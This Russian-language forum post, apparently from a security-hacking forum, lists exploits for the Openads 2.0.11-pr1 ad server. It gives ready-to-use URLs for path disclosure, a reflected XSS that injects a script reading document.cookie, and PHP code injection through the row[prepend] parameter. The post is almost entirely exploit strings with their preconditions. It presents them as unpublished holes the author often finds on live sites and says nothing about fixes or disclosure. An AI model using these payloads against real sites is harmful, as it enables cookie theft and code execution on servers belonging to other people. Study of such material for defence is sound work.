Уязвимости Openads 2.0.11-pr1
 

Это последняя версия движка в ветке OpenX 2.0.
Частенько сталкиваюсь с ним на сайтах, в инете уязвимостей по нему не видел...

>> Раскрытие пути:
условия:
+ display_errors = On

сплоит: http://openads/adlayer.php?layerstyle=antichat

>> XSS
условия:
+ register_globals = On

сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<script>alert(document.cookie)</script>
http://openads/adcontent.php?bannerid=id&row[append]=<script>alert(document.cookie)</script>
id - номер существующего баннера

>> Выполнение php кода
условия:
+ $phpAds_config['type_html_php'] = true; // default false
+ наличие html баннера
+ register_globals = On


сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<?php phpinfo();?>
id - номер существующего html баннера

>> Раскрытие пути:
условия:
+ display_errors = On

сплоит: http://openads/adclick.php?bannerid=id&antichat=xe%0Ak%0A
id - номер существующего баннера